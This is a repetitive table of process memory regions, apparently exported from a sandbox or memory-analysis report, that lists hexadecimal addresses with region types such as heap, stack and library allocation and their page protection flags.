|
||
453F000
|
heap
|
page read and write
|
||
13BE000
|
heap
|
page read and write
|
||
BF8000
|
heap
|
page read and write
|
||
453D000
|
heap
|
page read and write
|
||
3199000
|
heap
|
page read and write
|
||
BF4000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
5B2E000
|
stack
|
page read and write
|
||
2810000
|
heap
|
page read and write
|
||
163C000
|
stack
|
page read and write
|
||
45AE000
|
heap
|
page read and write
|
||
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
539E000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
45A5000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
14B2000
|
trusted library allocation
|
page read and write
|
||
FA0000
|
heap
|
page read and write
|
||
77B5439000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
45AF000
|
heap
|
page read and write
|
||
3196000
|
heap
|
page read and write
|
||
6700000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
22127560000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
402C000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
17DBF9E0000
|
heap
|
page read and write
|
||
42D9BFE000
|
stack
|
page read and write
|
||
4D56000
|
trusted library allocation
|
page read and write
|
||
4094000
|
heap
|
page read and write
|
||
4531000
|
heap
|
page read and write
|
||
4D80000
|
heap
|
page read and write
|
||
6560000
|
heap
|
page read and write
|
||
13DB000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
C75000
|
heap
|
page read and write
|
||
27B0000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
3196000
|
heap
|
page read and write
|
||
45A0000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
453D000
|
heap
|
page read and write
|
||
4326000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
168E000
|
heap
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
45A2000
|
heap
|
page read and write
|
||
2F00000
|
heap
|
page read and write
|
||
C9A000
|
heap
|
page read and write
|
||
6E50000
|
trusted library allocation
|
page execute and read and write
|
||
406D000
|
heap
|
page read and write
|
||
30E4000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
17DC1300000
|
heap
|
page read and write
|
||
4531000
|
heap
|
page read and write
|
||
4535000
|
heap
|
page read and write
|
||
BE0000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
221275A0000
|
trusted library allocation
|
page read and write
|
||
432A000
|
heap
|
page read and write
|
||
2213F8F7000
|
heap
|
page execute and read and write
|
||
4053000
|
heap
|
page read and write
|
||
174D000
|
heap
|
page read and write
|
||
45A8000
|
heap
|
page read and write
|
||
319D000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
45A2000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
77B624B000
|
stack
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
22125672000
|
heap
|
page read and write
|
||
FF0000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
4324000
|
heap
|
page read and write
|
||
C27000
|
heap
|
page read and write
|
||
6F20000
|
heap
|
page read and write
|
||
3D52000
|
heap
|
page read and write
|
||
7FFD34801000
|
trusted library allocation
|
page read and write
|
||
22127640000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
319E000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
5AEE000
|
stack
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
14BB000
|
trusted library allocation
|
page execute and read and write
|
||
4533000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
58B0000
|
heap
|
page read and write
|
||
4321000
|
heap
|
page read and write
|
||
4C2000
|
unkown
|
page readonly
|
||
4326000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
50BF000
|
stack
|
page read and write
|
||
396C000
|
trusted library allocation
|
page read and write
|
||
33B1000
|
trusted library allocation
|
page read and write
|
||
490000
|
unkown
|
page write copy
|
||
221256FF000
|
heap
|
page read and write
|
||
401C000
|
heap
|
page read and write
|
||
E54000
|
trusted library allocation
|
page read and write
|
||
6581000
|
heap
|
page read and write
|
||
497E000
|
stack
|
page read and write
|
||
3D52000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
5C2E000
|
stack
|
page read and write
|
||
4322000
|
heap
|
page read and write
|
||
4323000
|
heap
|
page read and write
|
||
6615000
|
heap
|
page read and write
|
||
28D0000
|
heap
|
page execute and read and write
|
||
1660000
|
heap
|
page read and write
|
||
17DBF6C3000
|
heap
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
3D50000
|
heap
|
page read and write
|
||
EC0000
|
heap
|
page read and write
|
||
4B3000
|
unkown
|
page readonly
|
||
77B4EFE000
|
stack
|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
5E70000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4326000
|
heap
|
page read and write
|
||
3193000
|
heap
|
page read and write
|
||
319A000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
77B56BB000
|
stack
|
page read and write
|
||
4322000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
22127510000
|
trusted library allocation
|
page read and write
|
||
38FF000
|
trusted library allocation
|
page read and write
|
||
47F9000
|
direct allocation
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
6C0D000
|
stack
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
654B000
|
stack
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
17DBF760000
|
heap
|
page read and write
|
||
401C000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
319E000
|
heap
|
page read and write
|
||
6F80000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
DF8000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
3D52000
|
heap
|
page read and write
|
||
2916000
|
trusted library allocation
|
page read and write
|
||
34BB000
|
trusted library allocation
|
page read and write
|
||
3162000
|
trusted library allocation
|
page read and write
|
||
45A9000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
292D000
|
trusted library allocation
|
page read and write
|
||
13CA000
|
heap
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
17DBF68B000
|
heap
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
AF9000
|
stack
|
page read and write
|
||
315B000
|
trusted library allocation
|
page read and write
|
||
77B51FD000
|
stack
|
page read and write
|
||
E40000
|
trusted library allocation
|
page read and write
|
||
22128282000
|
trusted library allocation
|
page read and write
|
||
319C000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
4D76000
|
trusted library allocation
|
page read and write
|
||
5BF8000
|
heap
|
page read and write
|
||
BF3000
|
trusted library allocation
|
page execute and read and write
|
||
409A000
|
heap
|
page read and write
|
||
29E5000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
6E0E000
|
stack
|
page read and write
|
||
405C000
|
heap
|
page read and write
|
||
7FFD34653000
|
trusted library allocation
|
page execute and read and write
|
||
3D5F000
|
heap
|
page read and write
|
||
E64000
|
trusted library allocation
|
page read and write
|
||
4530000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
77B54BE000
|
stack
|
page read and write
|
||
3190000
|
trusted library allocation
|
page read and write
|
||
BF0000
|
heap
|
page read and write
|
||
4537000
|
heap
|
page read and write
|
||
E60000
|
trusted library allocation
|
page read and write
|
||
17DBF6AB000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
14A2000
|
trusted library allocation
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
13A0000
|
heap
|
page read and write
|
||
432A000
|
heap
|
page read and write
|
||
45AE000
|
heap
|
page read and write
|
||
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
3D59000
|
heap
|
page read and write
|
||
2A29000
|
trusted library allocation
|
page read and write
|
||
22128C30000
|
trusted library allocation
|
page read and write
|
||
5879000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
46D0000
|
direct allocation
|
page read and write
|
||
14B0000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
5C14000
|
heap
|
page read and write
|
||
7FFD3470C000
|
trusted library allocation
|
page execute and read and write
|
||
E0F000
|
stack
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
3D5E000
|
heap
|
page read and write
|
||
7FFD34652000
|
trusted library allocation
|
page read and write
|
||
2920000
|
trusted library allocation
|
page read and write
|
||
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
65C7000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
3D58000
|
heap
|
page read and write
|
||
65D0000
|
trusted library allocation
|
page execute and read and write
|
||
C00000
|
trusted library allocation
|
page read and write
|
||
661E000
|
stack
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
22127882000
|
trusted library allocation
|
page read and write
|
||
5870000
|
trusted library allocation
|
page read and write
|
||
2800000
|
trusted library allocation
|
page execute and read and write
|
||
C6C000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
3D5F000
|
heap
|
page read and write
|
||
C16000
|
trusted library allocation
|
page execute and read and write
|
||
4538000
|
heap
|
page read and write
|
||
2213FA00000
|
heap
|
page execute and read and write
|
||
BB0000
|
heap
|
page read and write
|
||
319A000
|
heap
|
page read and write
|
||
221291AC000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
77B62CD000
|
stack
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
221255E0000
|
heap
|
page read and write
|
||
33FD000
|
trusted library allocation
|
page read and write
|
||
2660000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
4533000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
5CCF000
|
heap
|
page read and write
|
||
3D53000
|
heap
|
page read and write
|
||
22125706000
|
heap
|
page read and write
|
||
22125600000
|
heap
|
page read and write
|
||
453C000
|
heap
|
page read and write
|
||
22125720000
|
heap
|
page read and write
|
||
4D3B000
|
trusted library allocation
|
page read and write
|
||
45A2000
|
heap
|
page read and write
|
||
6D8E000
|
stack
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
28EC000
|
trusted library allocation
|
page read and write
|
||
77B563B000
|
stack
|
page read and write
|
||
3D54000
|
heap
|
page read and write
|
||
319E000
|
heap
|
page read and write
|
||
3D55000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
2851000
|
trusted library allocation
|
page read and write
|
||
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
EB0000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
179E000
|
stack
|
page read and write
|
||
FA7000
|
heap
|
page read and write
|
||
E27000
|
trusted library allocation
|
page execute and read and write
|
||
4532000
|
heap
|
page read and write
|
||
4534000
|
heap
|
page read and write
|
||
4DD0000
|
trusted library allocation
|
page execute and read and write
|
||
43D9000
|
trusted library allocation
|
page read and write
|
||
6641000
|
heap
|
page read and write
|
||
490000
|
unkown
|
page write copy
|
||
409A000
|
heap
|
page read and write
|
||
4536000
|
heap
|
page read and write
|
||
7FFD34736000
|
trusted library allocation
|
page execute and read and write
|
||
3D5A000
|
heap
|
page read and write
|
||
3D55000
|
heap
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
582C000
|
stack
|
page read and write
|
||
2213F8F0000
|
heap
|
page execute and read and write
|
||
432B000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
139D000
|
trusted library allocation
|
page execute and read and write
|
||
45A6000
|
heap
|
page read and write
|
||
6E80000
|
trusted library allocation
|
page read and write
|
||
4D42000
|
trusted library allocation
|
page read and write
|
||
3199000
|
heap
|
page read and write
|
||
B6E000
|
stack
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
BF4000
|
trusted library allocation
|
page read and write
|
||
17DBF6AE000
|
heap
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
66B0000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
3199000
|
heap
|
page read and write
|
||
C10000
|
heap
|
page read and write
|
||
3197000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
17DBF6B1000
|
heap
|
page read and write
|
||
432A000
|
heap
|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
432E000
|
heap
|
page read and write
|
||
4530000
|
direct allocation
|
page read and write
|
||
EE7000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
319E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
77B614E000
|
stack
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page execute and read and write
|
||
4532000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
482000
|
unkown
|
page readonly
|
||
FA0000
|
heap
|
page read and write
|
||
3D54000
|
heap
|
page read and write
|
||
3192000
|
heap
|
page read and write
|
||
3D51000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
515E000
|
stack
|
page read and write
|
||
7FFD34820000
|
trusted library allocation
|
page execute and read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
E26000
|
heap
|
page read and write
|
||
4D84000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
453D000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
2A2E000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
1418000
|
heap
|
page read and write
|
||
17DBF9EE000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
77B507B000
|
stack
|
page read and write
|
||
47F9000
|
direct allocation
|
page read and write
|
||
3D53000
|
heap
|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
502000
|
unkown
|
page readonly
|
||
3171000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
6630000
|
trusted library allocation
|
page execute and read and write
|
||
EB0000
|
trusted library allocation
|
page read and write
|
||
2213FA6F000
|
heap
|
page read and write
|
||
453D000
|
heap
|
page read and write
|
||
3197000
|
heap
|
page read and write
|
||
4322000
|
heap
|
page read and write
|
||
4535000
|
heap
|
page read and write
|
||
453F000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
45A7000
|
heap
|
page read and write
|
||
453C000
|
heap
|
page read and write
|
||
3D55000
|
heap
|
page read and write
|
||
4F4E000
|
stack
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
65BD000
|
trusted library allocation
|
page read and write
|
||
45A9000
|
heap
|
page read and write
|
||
14A0000
|
trusted library allocation
|
page read and write
|
||
3D51000
|
heap
|
page read and write
|
||
3D53000
|
heap
|
page read and write
|
||
432F000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
3194000
|
heap
|
page read and write
|
||
BFD000
|
trusted library allocation
|
page execute and read and write
|
||
3197000
|
heap
|
page read and write
|
||
4327000
|
heap
|
page read and write
|
||
432C000
|
heap
|
page read and write
|
||
59C000
|
stack
|
page read and write
|
||
14D6000
|
heap
|
page read and write
|
||
406D000
|
heap
|
page read and write
|
||
3D57000
|
heap
|
page read and write
|
||
4531000
|
heap
|
page read and write
|
||
3D57000
|
heap
|
page read and write
|
||
4327000
|
heap
|
page read and write
|
||
2213F653000
|
heap
|
page read and write
|
||
2213F760000
|
heap
|
page read and write
|
||
2A17000
|
trusted library allocation
|
page read and write
|
||
47F9000
|
direct allocation
|
page read and write
|
||
4D5D000
|
trusted library allocation
|
page read and write
|
||
45A4000
|
heap
|
page read and write
|
||
E6D000
|
trusted library allocation
|
page execute and read and write
|
||
E5D000
|
trusted library allocation
|
page execute and read and write
|
||
221256E2000
|
heap
|
page read and write
|
||
46D0000
|
direct allocation
|
page read and write
|
||
47FD000
|
direct allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
45AF000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
6E88000
|
trusted library allocation
|
page read and write
|
||
BDF000
|
stack
|
page read and write
|
||
42D96FF000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
4534000
|
heap
|
page read and write
|
||
4D45000
|
trusted library allocation
|
page read and write
|
||
45A8000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
453D000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
38E1000
|
trusted library allocation
|
page read and write
|
||
453F000
|
heap
|
page read and write
|
||
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
4530000
|
direct allocation
|
page read and write
|
||
45AA000
|
heap
|
page read and write
|
||
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
4D3E000
|
trusted library allocation
|
page read and write
|
||
221258B5000
|
heap
|
page read and write
|
||
4C2000
|
unkown
|
page readonly
|
||
3192000
|
heap
|
page read and write
|
||
42D9CFF000
|
stack
|
page read and write
|
||
6E70000
|
trusted library allocation
|
page execute and read and write
|
||
30E3000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
4D51000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
27BE000
|
stack
|
page read and write
|
||
3D50000
|
heap
|
page read and write
|
||
3FBD000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
319F000
|
heap
|
page read and write
|
||
2213FAA5000
|
heap
|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
3D51000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4535000
|
heap
|
page read and write
|
||
4EB0000
|
heap
|
page execute and read and write
|
||
50CE000
|
stack
|
page read and write
|
||
3195000
|
heap
|
page read and write
|
||
3D5A000
|
heap
|
page read and write
|
||
3D59000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
2840000
|
heap
|
page read and write
|
||
45A5000
|
heap
|
page read and write
|
||
3191000
|
heap
|
page read and write
|
||
45A2000
|
heap
|
page read and write
|
||
6F40000
|
trusted library allocation
|
page execute and read and write
|
||
37E1000
|
trusted library allocation
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
77B5336000
|
stack
|
page read and write
|
||
6720000
|
trusted library allocation
|
page execute and read and write
|
||
4329000
|
heap
|
page read and write
|
||
2213FA30000
|
heap
|
page read and write
|
||
3851000
|
trusted library allocation
|
page read and write
|
||
33A0000
|
heap
|
page execute and read and write
|
||
45A4000
|
heap
|
page read and write
|
||
1667000
|
heap
|
page read and write
|
||
22128C3D000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
45AD000
|
heap
|
page read and write
|
||
4532000
|
heap
|
page read and write
|
||
133E000
|
stack
|
page read and write
|
||
4320000
|
heap
|
page read and write
|
||
443C000
|
trusted library allocation
|
page read and write
|
||
453F000
|
heap
|
page read and write
|
||
529E000
|
stack
|
page read and write
|
||
60EE000
|
stack
|
page read and write
|
||
4115000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4AB000
|
unkown
|
page readonly
|
||
A1E000
|
stack
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
4653000
|
direct allocation
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
17DBF697000
|
heap
|
page read and write
|
||
77B517F000
|
stack
|
page read and write
|
||
319C000
|
heap
|
page read and write
|
||
642E000
|
stack
|
page read and write
|
||
453F000
|
heap
|
page read and write
|
||
EB1000
|
heap
|
page read and write
|
||
66B5000
|
trusted library allocation
|
page read and write
|
||
4531000
|
heap
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
77B50FF000
|
stack
|
page read and write
|
||
3D56000
|
heap
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
3D58000
|
heap
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
47FD000
|
direct allocation
|
page read and write
|
||
59EC000
|
stack
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
4530000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
432C000
|
heap
|
page read and write
|
||
5D6E000
|
stack
|
page read and write
|
||
42D99FD000
|
stack
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
317D000
|
trusted library allocation
|
page read and write
|
||
34C9000
|
trusted library allocation
|
page read and write
|
||
BFD000
|
trusted library allocation
|
page execute and read and write
|
||
45A7000
|
heap
|
page read and write
|
||
3D50000
|
heap
|
page read and write
|
||
14A6000
|
trusted library allocation
|
page execute and read and write
|
||
348D000
|
trusted library allocation
|
page read and write
|
||
22127651000
|
trusted library allocation
|
page read and write
|
||
C0D000
|
trusted library allocation
|
page execute and read and write
|
||
410C000
|
heap
|
page read and write
|
||
22128C58000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
4531000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
5439000
|
trusted library allocation
|
page read and write
|
||
453A000
|
heap
|
page read and write
|
||
D50000
|
trusted library allocation
|
page read and write
|
||
45A4000
|
heap
|
page read and write
|
||
7FFD34832000
|
trusted library allocation
|
page read and write
|
||
7FFD34706000
|
trusted library allocation
|
page read and write
|
||
432A000
|
heap
|
page read and write
|
||
5E2E000
|
stack
|
page read and write
|
||
525E000
|
stack
|
page read and write
|
||
1383000
|
trusted library allocation
|
page execute and read and write
|
||
2985000
|
trusted library allocation
|
page read and write
|
||
4530000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
5E80000
|
trusted library allocation
|
page execute and read and write
|
||
409A000
|
heap
|
page read and write
|
||
5E6E000
|
stack
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3FBD000
|
heap
|
page read and write
|
||
4B3000
|
unkown
|
page readonly
|
||
45A5000
|
heap
|
page read and write
|
||
4C2000
|
unkown
|
page readonly
|
||
409A000
|
heap
|
page read and write
|
||
143F000
|
heap
|
page read and write
|
||
65B0000
|
trusted library allocation
|
page read and write
|
||
16AD000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3D5A000
|
heap
|
page read and write
|
||
4530000
|
direct allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
3197000
|
heap
|
page read and write
|
||
EF8000
|
trusted library allocation
|
page read and write
|
||
45A8000
|
heap
|
page read and write
|
||
17DBF660000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
432A000
|
heap
|
page read and write
|
||
45A2000
|
heap
|
page read and write
|
||
4D70000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
22125702000
|
heap
|
page read and write
|
||
453C000
|
heap
|
page read and write
|
||
4533000
|
heap
|
page read and write
|
||
713F000
|
stack
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
C18000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
4321000
|
heap
|
page read and write
|
||
65AE000
|
stack
|
page read and write
|
||
C25000
|
trusted library allocation
|
page execute and read and write
|
||
409A000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
316E000
|
trusted library allocation
|
page read and write
|
||
3D59000
|
heap
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
656E000
|
stack
|
page read and write
|
||
4530000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
4325000
|
heap
|
page read and write
|
||
7DF436950000
|
trusted library allocation
|
page execute and read and write
|
||
4533000
|
heap
|
page read and write
|
||
3140000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
6E85000
|
trusted library allocation
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
13D6000
|
heap
|
page read and write
|
||
5AEE000
|
stack
|
page read and write
|
||
42D97FE000
|
stack
|
page read and write
|
||
3401000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
42D9DFB000
|
stack
|
page read and write
|
||
50A000
|
unkown
|
page readonly
|
||
4E00000
|
heap
|
page execute and read and write
|
||
410C000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
453C000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
29D8000
|
trusted library allocation
|
page read and write
|
||
2830000
|
trusted library allocation
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
27AC000
|
stack
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
27C0000
|
trusted library allocation
|
page execute and read and write
|
||
319E000
|
heap
|
page read and write
|
||
83C000
|
stack
|
page read and write
|
||
DE0000
|
trusted library allocation
|
page execute and read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
432C000
|
heap
|
page read and write
|
||
7FFD3466B000
|
trusted library allocation
|
page read and write
|
||
17DBF6C3000
|
heap
|
page read and write
|
||
4329000
|
heap
|
page read and write
|
||
13A8000
|
heap
|
page read and write
|
||
33EF000
|
trusted library allocation
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
7FFD34654000
|
trusted library allocation
|
page read and write
|
||
22125699000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
482000
|
unkown
|
page readonly
|
||
58A0000
|
heap
|
page execute and read and write
|
||
410C000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
486E000
|
direct allocation
|
page read and write
|
||
14B5000
|
trusted library allocation
|
page execute and read and write
|
||
71E0000
|
heap
|
page read and write
|
||
6E90000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4536000
|
heap
|
page read and write
|
||
3F4E000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
4534000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
4533000
|
heap
|
page read and write
|
||
3458000
|
trusted library allocation
|
page read and write
|
||
42D93FE000
|
stack
|
page read and write
|
||
17DBF697000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
A95000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
17DBF68A000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
4E3E000
|
stack
|
page read and write
|
||
2213F839000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
46D0000
|
direct allocation
|
page read and write
|
||
5430000
|
trusted library allocation
|
page read and write
|
||
E87000
|
trusted library allocation
|
page execute and read and write
|
||
3190000
|
heap
|
page read and write
|
||
4321000
|
heap
|
page read and write
|
||
22137800000
|
trusted library allocation
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
22137660000
|
trusted library allocation
|
page read and write
|
||
5C16000
|
heap
|
page read and write
|
||
77B4FFE000
|
stack
|
page read and write
|
||
453D000
|
heap
|
page read and write
|
||
674D000
|
stack
|
page read and write
|
||
3D50000
|
heap
|
page read and write
|
||
4323000
|
heap
|
page read and write
|
||
E8B000
|
trusted library allocation
|
page execute and read and write
|
||
406D000
|
heap
|
page read and write
|
||
1380000
|
trusted library allocation
|
page read and write
|
||
6BCF000
|
stack
|
page read and write
|
||
17DBF668000
|
heap
